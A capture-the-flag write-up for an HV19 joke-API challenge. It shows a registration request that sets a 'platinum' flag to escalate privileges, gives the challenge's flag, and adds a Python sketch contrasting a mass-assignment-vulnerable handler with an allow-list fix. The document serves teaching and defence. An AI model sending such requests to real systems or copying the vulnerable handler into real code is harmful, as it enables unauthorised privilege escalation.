The given API consists of three endpoints: /register, /login, /random. The workflow is the following:
- Register a user
- Log in and retrieve the auth token
- Get a random joke using the auth token

When creating a basic user, logging in and calling /random, we receive a JSON object containing the actual joke, the author of the joke and a flag called platinum, indicating whether the joke is a platinum one or not. So I guess it is about receiving a platinum joke.
I thought, maybe I need to become platinum. I created another user using the following POST request:

    POST http://whale.hacking-lab.com:10101/fsja/register

    {
      "username": "some_user2",
      "password": "passwordpassword",
      "platinum": true
    }

After logging in and asking for a random joke we get:

    {
      "joke": "Congratulation! Sometimes bugs are rather stupid. But that's how it happens, sometimes. Doing all the crypto stuff right and forgetting the trivial stuff like input validation, Hohoho! Here's your flag: HV19{th3_cha1n_1s_0nly_as_str0ng_as_th3_w3ak3st_l1nk}",
      "author": "Santa",
      "platinum": true
    }

That’s it! The flag is HV19{th3_cha1n_1s_0nly_as_str0ng_as_th3_w3ak3st_l1nk}.
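
The joke text names the root cause: /register accepted a client-supplied platinum field without input validation. The following is an added example, not the challenge's server code (which the write-up does not show); the function names, the in-memory user record and the allow-list are assumptions chosen to show how such a handler goes wrong and how an allow-list fixes it.

```python
"""Mass assignment in a registration handler, and an allow-list fix.

Hypothetical sketch: the challenge's real server code is not on the page.
"""

ALLOWED_FIELDS = {"username", "password"}  # the only fields a client may set


class ValidationError(ValueError):
    """Raised when a registration body fails validation."""


def register_vulnerable(payload: dict) -> dict:
    # Server-side defaults ...
    user = {"username": None, "password": None, "platinum": False}
    # ... overwritten by whatever keys the client sent, including "platinum".
    user.update(payload)
    return user


def register_hardened(payload: dict) -> dict:
    if not isinstance(payload, dict):
        raise ValidationError("body must be a JSON object")
    # Reject anything outside the allow-list instead of silently copying it.
    unknown = set(payload) - ALLOWED_FIELDS
    if unknown:
        raise ValidationError(f"unexpected fields: {sorted(unknown)}")
    for field in sorted(ALLOWED_FIELDS):
        value = payload.get(field)
        if not isinstance(value, str) or not value:
            raise ValidationError(f"{field} must be a non-empty string")
    # Privileged attributes are set by the server only, never taken from input.
    return {
        "username": payload["username"],
        "password": payload["password"],  # hash before storing in real code
        "platinum": False,
    }


# Request body from the write-up above.
REQUEST = {"username": "some_user2", "password": "passwordpassword", "platinum": True}

if __name__ == "__main__":
    print("vulnerable:", register_vulnerable(REQUEST)["platinum"])
    try:
        register_hardened(REQUEST)
    except ValidationError as exc:
        print("hardened rejected request:", exc)
```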